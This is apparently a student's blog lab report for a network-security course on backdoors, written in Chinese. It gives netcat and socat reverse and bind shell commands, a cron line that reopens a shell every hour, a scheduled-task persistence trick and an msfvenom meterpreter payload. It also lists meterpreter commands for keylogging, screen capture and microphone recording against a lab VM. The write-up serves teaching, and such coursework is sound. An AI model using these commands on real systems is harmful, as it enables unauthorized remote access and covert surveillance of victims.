20144303石宇森《网络对抗》后门原理与实践

20144303石宇森《网络对抗》 后门原理与实践

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 下载软件时,后门捆绑在下载的软件上,与软件一起安装进入了系统

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • Windows:用户自己运行了后门软件、设置了任务计划启动

  • linux:设置了cron启动,在到达规定的时间时后门启动

(3)Meterpreter有哪些给你映像深刻的功能?

最可怕的就是使用靶机的摄像头进行拍照和录像吧。感觉在电脑前的一举一动都能被攻击主机掌握。另外就是获取目标机键入信息的功能。确实十分强大,攻击方可以掌握我们输入的所有东西,像输入的密码、发送的消息什么的已经不算是秘密了。

细思极恐,好像只要黑客想知道的东西没有他没办法搞定的。我们这样一个简单的后门软件都能有如此强大的功能。应该是学好网络攻防,走遍天下都不怕了。

(4)如何发现自己有系统有没有被安装后门?

简单的方法就是通过杀毒软件杀毒吧。还可以查看进程列表,注册表。

实验总结与体会

实践总结:

  • 通过此次实验,掌握了一下基本内容:
  • Windows如何获取目标主机的shell:使用ncat打开监听端口,目标主机连接到端口时就获得了其shell
  • linux如何获取目标主机的shell:通过命令nc -l -p 打开端口,等待目标主机连接即可获得其shell
  • 学会打开cron启动
  • 掌握打开任务计划启动的方法
  • 掌握生成后门文件的方法,并将其通过ncat或者socat传输给目标主机
  • 了解一些常见的meterpreter命令,并使用一些基本的命令攻击靶机(如使用目标机摄像头、截取目标机屏幕等)

心得体会

完成这次实验后,掌握了打开不同操作系统下打开后门的方法,学会了如何在linux下生成一个后门软件,通过实践熟悉了meterpreter的各个命令的使用方法和功能。另外,通过这次亲身实践,也体会到了黑客软件功能的强大,作为普通计算机用户的我们只要稍不留神,身上的大量信息就有可能被黑客盗取。这也从一方面说明了学好这门课程的重要性,不只是要懂得如何完成攻击,更重要的是要通过学习掌握预防攻击,反抗攻击的方法。真是实践出真知啊!

实验过程记录

一、使用netcat获取主机操作Shell,cron启动:

Windows获取linux的shell:

1、在Windows下查看主机的ip地址

2、ncat.exe -l -p 4303 打开监听

3、nc 192.168.75.129 4303 -e /bin/sh 在linux下反弹式连接到Windows

4、Windows获得了linux的shell

linux获得Windows的shell:

1、查看linux的ip地址

2、nc -l -p 4303打开监听端口

3、ncat.exe -e cmd.exe 192.168.75.128 4303 让Windows连接到linux上

4、linux获得了Windows主机的shell

cron启动:

1、Windows打开监听端口

2、用指令crontab -e 对定时任务进行编辑。将最后一行修改为

45 * * * * /bin/netcat 192.168.75.129 4303 -e /bin/sh

3、等到每个小时的45分时,linux会自动打开后门,获取linux的shell

二、使用socat获取主机操作Shell, 任务计划启动

1、新建一个触发器,开始任务选择工作站锁定时。

2、新建操作,选择启动程序,程序定位到socat.exe,参数填

tcp-listen:4303 exec:cmd.exe,pty,stderr

3、按ALT+L锁定计算机用户,使新建的操作触发

4、此时,在linux端下使用命令socat - tcp:192.168.75.129:4303连接到Windows主机,获取Windows的shell

三、使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1、使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.86.129 LPORT=5215 -f exe > 20144303.exe自动生成一个后门程序

2、windows打开监听端口,等待linux传输后门文件

3、kali端将后门软件传输给Windows

四、使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1、输入msfconsole进入msf控制台

2、修改IP地址和端口号

3、在windows下打开后门软件

4、使用exploit命令对Windows进行攻击

5、攻击成功,kali获得了Windows的shell

6、screenshot命令截取目标机的屏幕

7、使用摄像头拍照、录像。(不知为何失败了)

8、使用命令record_mic截取一段音频

9、使用命令keyscan_start和keysca_dump捕获靶机的键入信息

10、查看当前用户

11、查看文件

12、命令靶机关机

posted @ 2017-03-19 23:39  20144303石宇森  阅读(294)  评论(0编辑  收藏  举报